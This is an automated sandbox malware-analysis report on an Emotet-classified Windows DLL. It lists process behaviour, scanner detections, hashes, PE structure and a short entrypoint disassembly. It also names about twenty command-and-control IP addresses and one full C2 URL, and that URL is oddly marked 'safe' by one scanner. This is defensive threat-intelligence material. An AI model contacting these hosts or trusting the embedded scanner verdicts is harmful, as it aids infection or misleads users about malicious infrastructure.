                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 531996 Sample: spZRMihlrkFGqYq1f.dll Startdate: 01/12/2021 Architecture: WINDOWS Score: 96 32 85.214.67.203 STRATOSTRATOAGDE Germany 2->32 34 195.154.146.35 OnlineSASFR France 2->34 36 17 other IPs or domains 2->36 42 Sigma detected: Emotet RunDLL32 Process Creation 2->42 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 3 other signatures 2->48 9 loaddll32.exe 1 2->9         started        11 svchost.exe 1 2->11         started        13 svchost.exe 1 2->13         started        15 2 other processes 2->15 signatures3 process4 process5 17 rundll32.exe 2 9->17         started        20 cmd.exe 1 9->20         started        signatures6 40 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->40 22 rundll32.exe 17->22         started        24 rundll32.exe 20->24         started        process7 process8 26 rundll32.exe 22->26         started        30 rundll32.exe 24->30         started        dnsIp9 38 51.178.61.60, 443, 49775 OVHFR France 26->38 50 System process connects to network (likely due to code injection or exploit) 26->50 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      spZRMihlrkFGqYq1f.dll43%MetadefenderBrowse
                      spZRMihlrkFGqYq1f.dll57%ReversingLabsWin32.Trojan.Mansabo

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.4710000.5.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.3fc0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.34d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.58b0000.11.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.4a70000.11.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.59a0000.13.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.4910000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.5bd0000.17.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.56e0000.7.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.42d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.4ed0000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.4630000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.5840000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.48b0000.7.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.5600000.5.unpack100%AviraHEUR/AGEN.1110387Download File
                      4.2.rundll32.exe.30d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.5ac0000.15.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://51.178.61.60/ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://51.178.61.60/ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000000C.00000003.818284709.000001A77038B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818383957.000001A770802000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818022632.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818039351.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818344967.000001A770372000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://help.disneyplus.com.svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://disneyplus.com/legal.svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      207.148.81.119
                      		unknownUnited States
                      		20473AS-CHOOPAUStrue
                      196.44.98.190
                      		unknownGhana
                      		327814EcobandGHtrue
                      78.46.73.125
                      		unknownGermany
                      		24940HETZNER-ASDEtrue
                      37.59.209.141
                      		unknownFrance
                      		16276OVHFRtrue
                      85.214.67.203
                      		unknownGermany
                      		6724STRATOSTRATOAGDEtrue
                      191.252.103.16
                      		unknownBrazil
                      		27715LocawebServicosdeInternetSABRtrue
                      45.79.33.48
                      		unknownUnited States
                      		63949LINODE-APLinodeLLCUStrue
                      54.37.228.122
                      		unknownFrance
                      		16276OVHFRtrue
                      185.148.169.10
                      		unknownGermany
                      		44780EVERSCALE-ASDEtrue
                      142.4.219.173
                      		unknownCanada
                      		16276OVHFRtrue
                      54.38.242.185
                      		unknownFrance
                      		16276OVHFRtrue
                      195.154.146.35
                      		unknownFrance
                      		12876OnlineSASFRtrue
                      195.77.239.39
                      		unknownSpain
                      		60493FICOSA-ASEStrue
                      78.47.204.80
                      		unknownGermany
                      		24940HETZNER-ASDEtrue
                      168.197.250.14
                      		unknownArgentina
                      		264776OmarAnselmoRipollTDCNETARtrue
                      51.178.61.60
                      		unknownFrance
                      		16276OVHFRtrue
                      177.72.80.14
                      		unknownBrazil
                      		262543NewLifeFibraBRtrue
                      66.42.57.149
                      		unknownUnited States
                      		20473AS-CHOOPAUStrue
                      37.44.244.177
                      		unknownGermany
                      		47583AS-HOSTINGERLTtrue
                      51.210.242.234
                      		unknownFrance
                      		16276OVHFRtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:531996
                      Start date:01.12.2021
                      Start time:16:10:38
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:spZRMihlrkFGqYq1f.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:19
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal96.troj.evad.winDLL@17/0@0/20
                      EGA Information:
                      • Successful, ratio: 80%
                      HDC Information:
                      • Successful, ratio: 99.3% (good quality ratio 91.2%)
                      • Quality average: 75.6%
                      • Quality standard deviation: 29.5%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .dll
                      • Override analysis time to 240s for rundll32
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/531996/sample/spZRMihlrkFGqYq1f.dll

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:12:45API Interceptor7x Sleep call for process: svchost.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      207.148.81.119gvtdsqavfej.dllGet hashmaliciousBrowse
                        mhOX6jll6x.dllGet hashmaliciousBrowse
                          dguQYT8p8j.dllGet hashmaliciousBrowse
                            jSxIzXfwc7.dllGet hashmaliciousBrowse
                              mhOX6jll6x.dllGet hashmaliciousBrowse
                                X2XCewI2Yy.dllGet hashmaliciousBrowse
                                  dguQYT8p8j.dllGet hashmaliciousBrowse
                                    HMvjzUYq2h.dllGet hashmaliciousBrowse
                                      s9BZBDWmi4.dllGet hashmaliciousBrowse
                                        bFx5bZRC6P.dllGet hashmaliciousBrowse
                                          c7IUEh66u6.dllGet hashmaliciousBrowse
                                            HMvjzUYq2h.dllGet hashmaliciousBrowse
                                              s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                  WfCt2B042X.dllGet hashmaliciousBrowse
                                                    ZKVYER7XcT.dllGet hashmaliciousBrowse
                                                      2cq85E4EeM.dllGet hashmaliciousBrowse
                                                        WfCt2B042X.dllGet hashmaliciousBrowse
                                                          ZKVYER7XcT.dllGet hashmaliciousBrowse
                                                            6PPJENHoVW.dllGet hashmaliciousBrowse
                                                              196.44.98.190gvtdsqavfej.dllGet hashmaliciousBrowse
                                                                mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                  dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                    jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                      mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                        X2XCewI2Yy.dllGet hashmaliciousBrowse
                                                                          dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                            HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                              s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                  c7IUEh66u6.dllGet hashmaliciousBrowse
                                                                                    HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                      s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                        bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                          WfCt2B042X.dllGet hashmaliciousBrowse
                                                                                            ZKVYER7XcT.dllGet hashmaliciousBrowse
                                                                                              2cq85E4EeM.dllGet hashmaliciousBrowse
                                                                                                WfCt2B042X.dllGet hashmaliciousBrowse
                                                                                                  ZKVYER7XcT.dllGet hashmaliciousBrowse
                                                                                                    6PPJENHoVW.dllGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      AS-CHOOPAUSiU17wh2uUd.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      iU17wh2uUd.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      Sz4lxTmH7r.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      RFIlSRQKzj.exeGet hashmaliciousBrowse
                                                                                                      • 45.32.115.235
                                                                                                      setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      MMUc2aeWxZ.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      0pvsj0MF1D.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      Linux_amd64Get hashmaliciousBrowse
                                                                                                      • 45.32.162.141
                                                                                                      nkXzJnW7AH.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      67MPsax8fd.exeGet hashmaliciousBrowse
                                                                                                      • 136.244.117.138
                                                                                                      Linux_x86Get hashmaliciousBrowse
                                                                                                      • 45.77.44.252
                                                                                                      uI6mJo4TJQ.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      uI6mJo4TJQ.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      M2jG6lMe7Y.exeGet hashmaliciousBrowse
                                                                                                      • 202.182.120.6
                                                                                                      7LPqKhiPCL.exeGet hashmaliciousBrowse
                                                                                                      • 139.180.133.9
                                                                                                      wvYbWkOPqJ.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      wvYbWkOPqJ.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.253.196
                                                                                                      7OoLG7JkFCGet hashmaliciousBrowse
                                                                                                      • 44.40.164.168
                                                                                                      EcobandGHgvtdsqavfej.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      X2XCewI2Yy.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      c7IUEh66u6.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      WfCt2B042X.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      ZKVYER7XcT.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      2cq85E4EeM.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      WfCt2B042X.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      ZKVYER7XcT.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190
                                                                                                      6PPJENHoVW.dllGet hashmaliciousBrowse
                                                                                                      • 196.44.98.190

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      51c64c77e60f3980eea90869b68c58a8fehiVK2JSx.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      kQ9HU0gKVH.exeGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      gvtdsqavfej.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      X2XCewI2Yy.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      c7IUEh66u6.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      WfCt2B042X.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      ZKVYER7XcT.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      2cq85E4EeM.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      No created / dropped files found

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.7859159976425
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 95.51%
                                                                                                      • InstallShield setup (43055/19) 4.10%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.19%
                                                                                                      • DOS Executable Generic (2002/1) 0.19%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:spZRMihlrkFGqYq1f.dll
                                                                                                      File size:712704
                                                                                                      MD5:9f4fa905fd685d28c4ff28f24ad224a1
                                                                                                      SHA1:e186e0869276d3af6465d7c754b22527c7ac2ced
                                                                                                      SHA256:808e8247efd685bdbae3ea0e55de1e8ed8aecd1359a213b0c6291b73f007fdaf
                                                                                                      SHA512:d8c33eb38fe54e40d463f20b6091c88863f0fadc70382ad826d7c33e61d696af614e9ba8c73f84d4e13fb141289d5bd978451a5565f61e869a054a837fdef5e0
                                                                                                      SSDEEP:12288:WKEUkuAOLka1miSmuYr1V7nAobS3qTHPR101D:TEQLka1nBVDAoS3WvR
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y.V.8...8...8..I7...8..I7...8...8...:.......8.......8......48.......8.......8.......8.......8..Rich.8..........PE..L...(..a...

                                                                                                      File Icon

                                                                                                      Icon Hash:be71f1aca0b8c0c4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x1003d301
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x10000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:
                                                                                                      Time Stamp:0x61A0C528 [Fri Nov 26 11:29:44 2021 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:d8c52655a835ecb2c6fea489c7c7674b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      cmp dword ptr [esp+08h], 01h
                                                                                                      jne 00007FF29CC13127h
                                                                                                      call 00007FF29CC1ECF7h
                                                                                                      push dword ptr [esp+04h]
                                                                                                      mov ecx, dword ptr [esp+10h]
                                                                                                      mov edx, dword ptr [esp+0Ch]
                                                                                                      call 00007FF29CC13012h
                                                                                                      pop ecx
                                                                                                      retn 000Ch
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov edi, dword ptr [ebp+10h]
                                                                                                      mov eax, edi
                                                                                                      sub eax, 00000000h
                                                                                                      je 00007FF29CC1470Bh
                                                                                                      dec eax
                                                                                                      je 00007FF29CC146F3h
                                                                                                      dec eax
                                                                                                      je 00007FF29CC146BEh
                                                                                                      dec eax
                                                                                                      je 00007FF29CC1466Fh
                                                                                                      dec eax
                                                                                                      je 00007FF29CC145DFh
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      push ebx
                                                                                                      push 00000020h
                                                                                                      pop edx
                                                                                                      jmp 00007FF29CC13597h
                                                                                                      mov esi, dword ptr [eax]
                                                                                                      cmp esi, dword ptr [ecx]
                                                                                                      je 00007FF29CC1319Eh
                                                                                                      movzx esi, byte ptr [eax]
                                                                                                      movzx ebx, byte ptr [ecx]
                                                                                                      sub esi, ebx
                                                                                                      je 00007FF29CC13137h
                                                                                                      xor ebx, ebx
                                                                                                      test esi, esi
                                                                                                      setnle bl
                                                                                                      lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                      mov esi, ebx
                                                                                                      test esi, esi
                                                                                                      jne 00007FF29CC1358Fh
                                                                                                      movzx esi, byte ptr [eax+01h]
                                                                                                      movzx ebx, byte ptr [ecx+01h]
                                                                                                      sub esi, ebx
                                                                                                      je 00007FF29CC13137h
                                                                                                      xor ebx, ebx
                                                                                                      test esi, esi
                                                                                                      setnle bl
                                                                                                      lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                      mov esi, ebx
                                                                                                      test esi, esi
                                                                                                      jne 00007FF29CC1356Eh
                                                                                                      movzx esi, byte ptr [eax+02h]
                                                                                                      movzx ebx, byte ptr [ecx+02h]
                                                                                                      sub esi, ebx
                                                                                                      je 00007FF29CC13137h
                                                                                                      xor ebx, ebx
                                                                                                      test esi, esi
                                                                                                      setnle bl
                                                                                                      lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                      mov esi, ebx
                                                                                                      test esi, esi
                                                                                                      jne 00007FF29CC1354Dh
                                                                                                      movzx eax, byte ptr [eax]

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [RES] VS2005 build 50727
                                                                                                      • [ C ] VS2005 build 50727
                                                                                                      • [EXP] VS2005 build 50727
                                                                                                      • [C++] VS2005 build 50727
                                                                                                      • [ASM] VS2005 build 50727
                                                                                                      • [LNK] VS2005 build 50727

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x708900x4e.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6dec80xf0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x9af8.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000x767c.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x635580x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x580000x7d0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x6de400x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x566b70x57000False0.574984846444data6.6363911364IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x580000x188de0x19000False0.30236328125data4.88012998463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x710000x2a2540x27000False0.931434044471data7.84888321435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x9c0000x9af80xa000False0.241723632813data3.85640321845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xa60000xbd480xc000False0.347106933594data4.87718770475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_CURSOR0x9d7800x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9d8b40xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9d9680x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9da9c0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9db500x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9dc840xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9dd380x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9de6c0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9df200x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e0540xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e1080x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e3080xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e3bc0x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e5bc0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e6700x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e8700xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e9240x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9eb240xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9ebd80x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9ed0c0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9edc00x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9eef40xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9efa80x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9f0dc0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f2100x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f3440x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f4780x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f5ac0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f6e00x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f8140x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f9480x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9fa7c0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9fbb00x134AmigaOS bitmap fontEnglishUnited States
